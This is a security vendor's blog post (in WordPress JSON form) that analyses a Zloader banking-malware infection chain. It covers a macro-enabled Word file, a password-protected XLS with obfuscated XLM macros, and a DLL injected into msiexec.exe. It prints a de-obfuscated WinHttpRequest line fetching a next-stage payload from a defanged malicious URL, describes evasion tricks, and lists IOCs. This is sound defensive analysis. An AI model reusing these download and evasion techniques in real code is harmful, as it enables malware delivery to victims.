{"id":89697,"date":"2021-03-23T19:25:38","date_gmt":"2021-03-23T13:55:38","guid":{"rendered":"https:\/\/blogs.quickheal.com\/?p=89697"},"modified":"2023-06-17T17:02:25","modified_gmt":"2023-06-17T11:32:25","slug":"zloader-entailing-different-office-files","status":"publish","type":"post","link":"https:\/\/www.quickheal.com\/blogs\/zloader-entailing-different-office-files\/","title":{"rendered":"Zloader: Entailing Different Office Files"},"content":{"rendered":"<p>Zloader aka Terdot &#8211; a variant of the infamous Zeus <a href=\"https:\/\/blogs.quickheal.com\/banking-malware-dridex-bounces-back-pdf\/\">banking malware<\/a> is well known for aggressively using &#8220;.xls&#8221;, &#8220;.xlsx&#8221; documents as its initial vector to deliver its payload. Despite this, recently we have come across &#8220;.docm&#8221; file which is being used by Zoader family to perform its initial activity. This shows adversaries like to experiment with office documents to avoid being detected by security solutions.<\/p>\n<figure id=\"attachment_89699\" aria-describedby=\"caption-attachment-89699\" style=\"width: 606px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89699\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-1.png\" alt=\"\" width=\"606\" height=\"189\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-1.png 709w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-1-300x94.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-1-650x203.png 650w\" sizes=\"(max-width: 606px) 100vw, 606px\" \/><figcaption id=\"caption-attachment-89699\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 Fig.1-Attack Chain<\/em><\/figcaption><\/figure>\n<p><b>Initial\u00a0Vector:<\/b><\/p>\n<p>Here infection chain starts with &#8220;.docm&#8221; file. Docm stands for &#8220;Macro-enabled office word document&#8221;. We can see below, the document view asking user to enable content.<\/p>\n<figure id=\"attachment_89701\" aria-describedby=\"caption-attachment-89701\" style=\"width: 640px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89701\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-2.png\" alt=\"\" width=\"640\" height=\"382\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-2.png 1138w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-2-300x179.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-2-650x388.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-2-768x458.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-2-789x471.png 789w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-2-250x150.png 250w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><figcaption id=\"caption-attachment-89701\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.2- Document View<\/em><\/figcaption><\/figure>\n<p>Like many other documents, we tried to observe its activity after enabling content but there was no activity in it. By\u00a0 looking at its VBA code, we got our answer. Enabling content will not do execution of macro. Here macro execution\u00a0 starts on \u201cDocument close\u201d as shown.<\/p>\n<figure id=\"attachment_89702\" aria-describedby=\"caption-attachment-89702\" style=\"width: 679px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89702\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-3.png\" alt=\"\" width=\"679\" height=\"230\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-3.png 852w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-3-300x102.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-3-650x220.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-3-768x261.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-3-789x268.png 789w\" sizes=\"(max-width: 679px) 100vw, 679px\" \/><figcaption id=\"caption-attachment-89702\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.3- Macro Function Call<\/em><\/figcaption><\/figure>\n<p>As\u00a0soon\u00a0as\u00a0victim\u00a0close\u00a0this\u00a0document,\u00a0function\u00a0\u201c<i>nnn\u201d\u00a0<\/i>gets called which is the main function of this VBA macro. In this, again sub functions\u00a0 are being called. Here adversaries also make use of \u201cUserform\u201d to perform next stage activity.<\/p>\n<figure id=\"attachment_89703\" aria-describedby=\"caption-attachment-89703\" style=\"width: 526px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89703\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-4.png\" alt=\"\" width=\"526\" height=\"303\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-4.png 698w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-4-300x173.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-4-650x374.png 650w\" sizes=\"(max-width: 526px) 100vw, 526px\" \/><figcaption id=\"caption-attachment-89703\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.4- Sub Function Call<\/em><\/figcaption><\/figure>\n<p>UserForm_Initialize() function is used to invoke \u201cUserform2\u201d. Below image shows the userform2 object. In its dialog box, url data is\u00a0 chunked and overlapped on 25th ComboBox to hide actual data as shown below.<\/p>\n<figure id=\"attachment_89704\" aria-describedby=\"caption-attachment-89704\" style=\"width: 511px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-89704 size-large\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-5-511x390.png\" alt=\"\" width=\"511\" height=\"390\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-5-511x390.png 511w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-5-300x229.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-5.png 633w\" sizes=\"(max-width: 511px) 100vw, 511px\" \/><figcaption id=\"caption-attachment-89704\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.5- Hidden URL Data<\/em><\/figcaption><\/figure>\n<p>After going through all ComboBox of userform2, we were able to locate malicious url which is used to download 2nd stage payload.<\/p>\n<figure id=\"attachment_89705\" aria-describedby=\"caption-attachment-89705\" style=\"width: 572px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89705\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-6.png\" alt=\"\" width=\"572\" height=\"292\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-6.png 799w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-6-300x153.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-6-650x332.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-6-768x392.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-6-789x403.png 789w\" sizes=\"(max-width: 572px) 100vw, 572px\" \/><figcaption id=\"caption-attachment-89705\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.6- Chunked URL Data<\/em><\/figcaption><\/figure>\n<p>To sum up above activity, adversaries are making use of for loop to access all these values and create final url as shown\u00a0 below,<\/p>\n<figure id=\"attachment_89706\" aria-describedby=\"caption-attachment-89706\" style=\"width: 584px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89706\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-7.png\" alt=\"\" width=\"584\" height=\"347\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-7.png 751w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-7-300x178.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-7-650x386.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-7-250x150.png 250w\" sizes=\"(max-width: 584px) 100vw, 584px\" \/><figcaption id=\"caption-attachment-89706\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.7- Creation of URL on Document Close<\/em><\/figcaption><\/figure>\n<p>Site\u00a0\u201c<i>hxxps[:]\/\/feelingfit-always[.]com\/1[.]php<\/i>\u201d which is malicious having score 11 on virus total, is used to download password protected XLS file. Its password is hidden again in VBA macro in &#8220;Userform1&#8221;. By exploring userform1 data,\u00a0 we were able to extract hidden password.<\/p>\n<figure id=\"attachment_89707\" aria-describedby=\"caption-attachment-89707\" style=\"width: 701px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89707\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-8.png\" alt=\"\" width=\"701\" height=\"85\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-8.png 932w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-8-300x36.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-8-650x79.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-8-768x93.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-8-789x96.png 789w\" sizes=\"(max-width: 701px) 100vw, 701px\" \/><figcaption id=\"caption-attachment-89707\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.8- Macro Code to protect XLS with password<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_89708\" aria-describedby=\"caption-attachment-89708\" style=\"width: 678px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89708\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-9.png\" alt=\"\" width=\"678\" height=\"367\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-9.png 754w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-9-300x162.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-9-650x352.png 650w\" sizes=\"(max-width: 678px) 100vw, 678px\" \/><figcaption id=\"caption-attachment-89708\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.9- XLS Hidden Password<\/em><\/figcaption><\/figure>\n<p><b>2<\/b><b>nd<\/b><b>\u00a0Stage\u00a0Payload:<\/b><\/p>\n<p>Protecting document with password is classic technique to defend against AV vendors. Correct password is necessary to dig further into\u00a0 analysis. After matching above password, we can finally see excel workbook content. XLM macro is used in \u201cSheet3\u201d to perform further activity.<\/p>\n<figure id=\"attachment_89709\" aria-describedby=\"caption-attachment-89709\" style=\"width: 716px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89709\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-10.png\" alt=\"\" width=\"716\" height=\"388\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-10.png 1084w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-10-300x162.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-10-650x352.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-10-768x416.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-10-789x427.png 789w\" sizes=\"(max-width: 716px) 100vw, 716px\" \/><figcaption id=\"caption-attachment-89709\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 Fig.10- XLS Workbook<\/em><\/figcaption><\/figure>\n<p>Here code is embedded in different cells of document. Below figure shows the extracted macro code from above\u00a0 \u00a0workbook:<\/p>\n<figure id=\"attachment_89710\" aria-describedby=\"caption-attachment-89710\" style=\"width: 770px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89710\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Fig-11.png\" alt=\"\" width=\"770\" height=\"383\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-11.png 1118w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-11-300x149.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-11-650x323.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-11-768x382.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Fig-11-789x392.png 789w\" sizes=\"(max-width: 770px) 100vw, 770px\" \/><figcaption id=\"caption-attachment-89710\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 Fig.11- XLM Macro Code<\/em><\/figcaption><\/figure>\n<p>Here\u00a0adversaries\u00a0make\u00a0use\u00a0of\u00a0excel\u00a0inbuilt\u00a0functions\u00a0like\u00a0IIF\u00a0and\u00a0Switch\u00a0to\u00a0obfuscate\u00a0data.\u00a0Final\u00a0de-obfuscated\u00a0code\u00a0can\u00a0be\u00a0seen\u00a0as\u00a0below,<\/p>\n<p><em>\u00a0 \u00a0 \u00a0 \u00a0WinHttp.WinHttpRequest.5.1.open GET https[:]\/\/santarosafuneralhome[.]com\/2.php\u00a0 False<\/em><\/p>\n<p><em>\u00a0 \u00a0 \u00a0 \u00a0WinHttp.WinHttpRequest.5.1.SetRequestHeader<\/em><\/p>\n<p><em>\u00a0 \u00a0 \u00a0 \u00a0WinHttp.WinHttpRequest.5.1.send<\/em><\/p>\n<p>Above malicious url having virus total score 8 is used to download 3rd stage payload of this attack.<\/p>\n<p><b>Final\u00a0Payload\u00a0Analysis:<\/b><\/p>\n<p>The DLL is the final payload of Zloader. Here the DLL is highly obfuscated and avoids direct calls to the Windows APIs. Hashing is used to\u00a0 calculate the addresses and makes the call with the calculated values, making the reversing difficult.<\/p>\n<p>&nbsp;<\/p>\n<figure id=\"attachment_89748\" aria-describedby=\"caption-attachment-89748\" style=\"width: 566px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89748\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/Untitled.png\" alt=\"\" width=\"566\" height=\"477\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Untitled.png 700w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Untitled-300x253.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/Untitled-463x390.png 463w\" sizes=\"(max-width: 566px) 100vw, 566px\" \/><figcaption id=\"caption-attachment-89748\" class=\"wp-caption-text\">Fig.12 &#8211; Code for address calculation<\/figcaption><\/figure>\n<p>The\u00a0DLL\u00a0creates\u00a0process\u00a0<i>\u2018msiexec.exe\u2019<\/i>,\u00a0which\u00a0is\u00a0a\u00a0genuine<i>\u00a0<\/i>Microsoft process that belongs to Windows Component installer, in suspended\u00a0 mode and injects encrypted file to it.<\/p>\n<figure id=\"attachment_89714\" aria-describedby=\"caption-attachment-89714\" style=\"width: 695px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89714\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/3_CreateProcess_snip.png\" alt=\"\" width=\"695\" height=\"288\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/3_CreateProcess_snip.png 1248w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/3_CreateProcess_snip-300x125.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/3_CreateProcess_snip-650x270.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/3_CreateProcess_snip-768x319.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/3_CreateProcess_snip-789x327.png 789w\" sizes=\"(max-width: 695px) 100vw, 695px\" \/><figcaption id=\"caption-attachment-89714\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.13- &#8216;msiexec.exe&#8217; created in suspended mode<\/em><\/figcaption><\/figure>\n<figure id=\"attachment_89715\" aria-describedby=\"caption-attachment-89715\" style=\"width: 692px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89715\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/4_WPM_file_snip.png\" alt=\"\" width=\"692\" height=\"135\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/4_WPM_file_snip.png 970w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/4_WPM_file_snip-300x58.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/4_WPM_file_snip-650x127.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/4_WPM_file_snip-768x150.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/4_WPM_file_snip-789x154.png 789w\" sizes=\"(max-width: 692px) 100vw, 692px\" \/><figcaption id=\"caption-attachment-89715\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Fig.14- Encrypted file injected in &#8216;msiexec.exe&#8217;<\/em><\/figcaption><\/figure>\n<p>It\u00a0also\u00a0injects\u00a0a\u00a0routine\u00a0that\u00a0will\u00a0decrypt\u00a0and\u00a0bring\u00a0the\u00a0malicious\u00a0PE\u00a0out\u00a0for\u00a0execution.<\/p>\n<figure id=\"attachment_89716\" aria-describedby=\"caption-attachment-89716\" style=\"width: 680px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89716\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/5_Decryption_Routine.png\" alt=\"\" width=\"680\" height=\"300\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/5_Decryption_Routine.png 939w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/5_Decryption_Routine-300x132.png 300w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/5_Decryption_Routine-650x287.png 650w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/5_Decryption_Routine-768x339.png 768w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/5_Decryption_Routine-789x348.png 789w\" sizes=\"(max-width: 680px) 100vw, 680px\" \/><figcaption id=\"caption-attachment-89716\" class=\"wp-caption-text\"><em>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Fig.15- Decryption Routine<\/em><\/figcaption><\/figure>\n<p>With the setting of thread context, the initial execution point is passed and finally the injected code is executed with the resume thread.<\/p>\n<p>When\u00a0this\u00a0thread\u00a0of\u00a0<i>msiexec.exe<\/i>\u00a0comes\u00a0into\u00a0execution,\u00a0it\u00a0tries\u00a0to\u00a0make\u00a0connection\u00a0to\u00a0its\u00a0CnC\u00a0servers\u00a0as\u00a0shown,<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-89717 aligncenter\" src=\"https:\/\/blogs.quickheal.com\/wp-content\/uploads\/2021\/03\/6_Cnc.png\" alt=\"\" width=\"641\" height=\"147\" srcset=\"https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/6_Cnc.png 492w, https:\/\/www.quickheal.com\/blogs\/wp-content\/uploads\/2021\/03\/6_Cnc-300x69.png 300w\" sizes=\"(max-width: 641px) 100vw, 641px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Since\u00a0these\u00a0urls\u00a0were\u00a0down\u00a0at\u00a0the\u00a0time\u00a0of\u00a0analysis,\u00a0we\u00a0were\u00a0not\u00a0able\u00a0to\u00a0go\u00a0further\u00a0deeper\u00a0into\u00a0it.<\/p>\n<p><b>Conclusion:<\/b><\/p>\n<p>This type of attack shows how adversaries innovate their mechanism to start infection chain to compromise victim. User should always be\u00a0 cautious while opening any office files. <a href=\"https:\/\/www.quickheal.co.in\/\">Quick Heal<\/a> and <a href=\"https:\/\/www.seqrite.com\/\">Seqrite enterprise security solutions<\/a> protect its customers from such files. So, remember to keep the endpoint security solutions always updated.<\/p>\n<p><strong>IOCs:<\/strong><\/p>\n<p>DOCM:\u00a0117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d<\/p>\n<p>409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1<\/p>\n<p>91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4<\/p>\n<p>XLS:\u00a0\u00a0\u00a052d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89<\/p>\n<p>URL:<\/p>\n<p>https[:\/\/]tiodeitidampheater.tk\/post.php<\/p>\n<p>https[:\/\/]actes-etatcivil.com\/post.php<\/p>\n<p>https[:\/\/]ankarakreatif.com\/post.php<\/p>\n<p>https[:\/\/]www.ramazanyildiz.net\/post.php<\/p>\n<p>https[:\/\/]hispaniaeng.com\/post.php<\/p>\n<p>https[:\/\/]www.ifdd.francophonie.org\/post.php<\/p>\n<p><strong>Subject\u00a0Matter\u00a0Expert:<\/strong><\/p>\n<p>Anjali Raut<\/p>\n<p>Priyanka Shinde<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zloader aka Terdot &#8211; a variant of the infamous Zeus banking malware is well known for aggressively using &#8220;.xls&#8221;, &#8220;.xlsx&#8221; documents as its initial vector to deliver its payload. Despite this, recently we have come across &#8220;.docm&#8221; file which is being used by Zoader family to perform its initial activity. This shows adversaries like to [&hellip;]<\/p>\n","protected":false},"author":62,"featured_media":89719,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[164,1739,303,5],"tags":[1239,317,1794],"class_list":["post-89697","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-crime","category-cybersecurity","category-phishing","category-security","tag-cyber-security","tag-malware-attack","tag-zloader"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89697"}],"collection":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/users\/62"}],"replies":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/comments?post=89697"}],"version-history":[{"count":40,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89697\/revisions"}],"predecessor-version":[{"id":91514,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/posts\/89697\/revisions\/91514"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media\/89719"}],"wp:attachment":[{"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/media?parent=89697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/categories?post=89697"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.quickheal.com\/blogs\/wp-json\/wp\/v2\/tags?post=89697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}